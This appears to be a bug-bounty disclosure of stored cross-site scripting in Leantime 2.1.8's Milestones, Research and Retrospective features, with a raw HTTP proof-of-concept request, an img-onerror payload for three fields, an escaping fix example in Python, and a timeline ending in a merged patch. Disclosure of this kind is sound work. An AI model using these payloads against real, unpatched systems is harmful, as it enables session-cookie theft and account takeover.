Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on

Oct 12th 2021


Description

Multiple stored XSS in the 'Milestones', 'Research' and 'Retrospective' features of Leantime 2.1.8

Proof of Concept

// PoC.req
POST /leantime/public/tickets/editMilestone/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 157
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public/tickets/roadmap
Cookie: sid=e48bc373a563a82ae266820d40707a63b9c0bad4-3cef7db646d7f8424c47025854198bf8d39caede
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

headline=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(1)%3B%22%3E&status=3&dependentMilestone=&editorId=&tags=&editFrom=10%2F11%2F2021&editTo=10%2F18%2F2021

Steps to Reproduce

Milestones

Go to Milestones and choose Add Milestones

In the 'Milestone Title' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

Research

Go to Research and, on the Board, choose Add new

In the 'Hypothesis' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

Retrospective

Go to Retrospective and, on the Board, choose Add new

In the 'Description' input, enter the payload: "><iMg SrC="x" oNeRRor="alert(1);">

Impact

This vulnerability can be used to steal a user's session cookie and gain unauthorized access to that user's account with the stolen cookie.
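The root cause in all three features is the same: a stored field is echoed into HTML without output encoding. The following is an added example (not Leantime's own code; Leantime is PHP, where the equivalent fix is htmlspecialchars($headline, ENT_QUOTES, 'UTF-8')) that decodes the headline from the PoC body above, renders it into a hypothetical attribute-context template both unescaped and escaped, and counts the injected tags; the template and helper names are assumptions.

```python
# Added example, not Leantime's code: the PoC body above, rendered
# unescaped versus HTML-escaped. Leantime is PHP; the equivalent fix
# there is htmlspecialchars($headline, ENT_QUOTES, 'UTF-8').
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the form body from the PoC request above.
POC_BODY = (
    "headline=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(1)%3B%22%3E"
    "&status=3&dependentMilestone=&editorId=&tags="
    "&editFrom=10%2F11%2F2021&editTo=10%2F18%2F2021"
)

# Hypothetical template: the stored headline lands inside a quoted attribute.
TEMPLATE = '<input type="text" name="headline" value="{headline}">'


def headline_from_body(body: str) -> str:
    """Decode the submitted milestone title the way the server would."""
    return parse_qs(body, keep_blank_values=True)["headline"][0]


def render_vulnerable(headline: str) -> str:
    """Echo the stored value verbatim (the behaviour the report describes)."""
    return TEMPLATE.format(headline=headline)


def render_fixed(headline: str) -> str:
    """Encode & < > " ' before insertion; quote=True is what stops the
    leading '">' of the payload from closing the attribute."""
    return TEMPLATE.format(headline=html.escape(headline, quote=True))


def injected_tag_count(markup: str) -> int:
    """Defender-side check: count tags beyond the one the template emits."""
    return len(re.findall(r"<[a-zA-Z]", markup)) - 1


if __name__ == "__main__":
    h = headline_from_body(POC_BODY)
    print(render_vulnerable(h), injected_tag_count(render_vulnerable(h)))
    print(render_fixed(h), injected_tag_count(render_fixed(h)))
```

The escaped render keeps the payload as literal text inside the value attribute, so no second element and no event handler reach the browser.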

We have contacted a member of the leantime team and are waiting to hear back 2 months ago
lethanhphuc modified their report 2 months ago
Marcel Folaron validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
lethanhphuc submitted a
25 days ago
Marcel Folaron confirmed that a fix has been merged on 22a6da 21 days ago
lethanhphuc has been awarded the fix bounty